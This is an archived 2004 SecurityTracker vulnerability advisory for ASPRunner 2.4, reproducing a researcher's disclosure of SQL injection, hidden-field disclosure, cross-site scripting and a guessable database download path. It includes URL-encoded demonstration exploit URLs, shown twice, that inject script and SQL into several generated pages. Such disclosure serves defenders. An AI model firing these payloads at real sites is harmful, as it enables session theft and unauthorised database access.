SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   ASPRunner Vendors:   XLineSoft
ASPRunner Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1010777
SecurityTracker URL:  http://securitytracker.com/id/1010777
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 26 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 2.4 and prior versions
Description:   Several vulnerabilities were reported in ASPRunner. A remote user can inject SQL commands. A remote user can conduct cross-site scripting attacks. A remote user may also be able to download the underlying database.

Ferruh Mavituna reported that none of the pages (except the login pages) filter user-supplied input to protect against SQL injection attacks. A remote user can submit a specially crafted request to cause SQL commands to be executed on the underlying database.

It is also reported that a remote user can view and modify potentially sensitive information contained in hidden fields within the HTML forms. Some fields disclose full SQL queries, the report said.

It is also reported that several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted HTTP POST request that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ASPRunner scripts and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

For [TABLE]_search.asp (post):

http://[VICTIM]/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word
_id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&
SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&S
earchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&Se
archFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldNam
e=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Contains&SearchFor=

For [TABLE]_edit.asp (post):

http://[VICTIM]/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa
geNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ese
lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc
%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&Ne
edQuotes=&NeedQuotes=&action=view

For [TABLE]_list.asp (post):

http://[VICTIM]/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa
ge=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C
+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+
like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField
&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%2
9%3C%2Fscript%3E&PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQ
uoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=Tru
e&Typeen=202&NeedQuotesdesc=True&Typedesc=203

For export.asp (post):

http://[VICTIM]/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%
3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben
%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&
pagesize=20

It is also reported that a remote user can download the database if the name of the database file is known. By examining table and field names, a remote user may be able to guess the filename, the report said. A demonstration exploit URL is provided:

http://[VICTIM]/db/[DB-FILE-NAME]

The vendor was reportedly notified on July 5, 2004 and July 12, 2004 without response.

The original advisory is available at:

http://ferruh.mavituna.com/article/?574

Impact:   A remote user can inject SQL commands to be executed by the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASPRunner scripts, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user may be able to download the underlying database.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.xlinesoft.com/asprunner/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] ASPRunner Multiple Vulnerabilities


------------------------------------------------------
ASPRunner Multiple Vulnerabilities
------------------------------------------------------

Online URL : http://ferruh.mavituna.com/article/?574

1) SQL Injection;
Severity : Moderatly Critical

2) Information Disclosure;
Severity : Low Critical

3) XSS (Cross Site Scripting);
Severity : Low Critical

4) Database Download;
Severity : Moderatly Critical


------------------------------------------------------
ABOUT ASPRunner;
------------------------------------------------------
Developer Description;
ASPRunner creates a set of ASP pages to access and modify Oracle, SQL
Server, MS Access , DB2, MySQL, or FileMaker databases, or any other ODBC
datasource. Using generated ASP pages, users can search, sort, edit, delete
and add data into a database. ASPRunner is easy to learn, you can get
started in just 10 minutes!

URL & Demo Download ;
http://www.xlinesoft.com/asprunner/


------------------------------------------------------
VULNERABLE;
------------------------------------------------------
ASPRunner version 2.4 and below


------------------------------------------------------
NOT VULNERABLE;
------------------------------------------------------
-

------------------------------------------------------
1) SQL Injection;
------------------------------------------------------
Every Page is vulnerable to SQL Injection atacks. (Login pages are not
vulnerable). 
There is no POC because of SQL Injection attacks depends on database type
and structure.



------------------------------------------------------
2) INFORMATION DISCLOSURE;
------------------------------------------------------
An attacker can gain information from hidden fields and file names.

	- File names disclosure database generated table name.
	- Several hidden field shows complete SQL Queries
	- Also these hidden fields can be modified.
	- Errors are generating detailed page which gives lots of
information to the client.

------------------------------------------------------
3) XSS (Cross Site Scripting);
------------------------------------------------------
There are no control for XSS attacks, some samples from several pages;
	
	- [TABLE]_search.asp (post)
	
http://[VICTIM]/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word
_id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&
SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&S
earchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&Se
archFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldNam
e=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Contains&SearchFor=


	- [TABLE]_edit.asp (post)
	
http://[VICTIM]/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa
geNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ese
lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc
%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&Ne
edQuotes=&NeedQuotes=&action=view


	- [TABLE]_list.asp (post)
	
http://[VICTIM]/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa
ge=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C
+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+
like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField
&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%2
9%3C%2Fscript%3E&PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQ
uoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=Tru
e&Typeen=202&NeedQuotesdesc=True&Typedesc=203

	- export.asp (post)
	
http://[VICTIM]/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%
3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben
%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&
pagesize=20



------------------------------------------------------
4) Database Download;
------------------------------------------------------
	Database can be downloaded over web. This is not a critical issue
because there is no way to determine filename. But it's easy to guess it by
gathering information about table and field names.

	MS Access or other database file (if it's not MSSQL, similar or ODBC
Connection) can be found on http://[VICTIM]/db/[DB-FILE-NAME]



-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 04.07.2004
Vendor Informed : 05.07.2004 / 12.07.2004
Published : 26.07.2004


------------------------------------------------------
Vendor Status;
------------------------------------------------------
2 emails, No Reply, No Fix



Ferruh Mavituna
http://ferruh.mavituna.com
PGP Key: http://ferruh.mavituna.com/pgpkey.asc


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC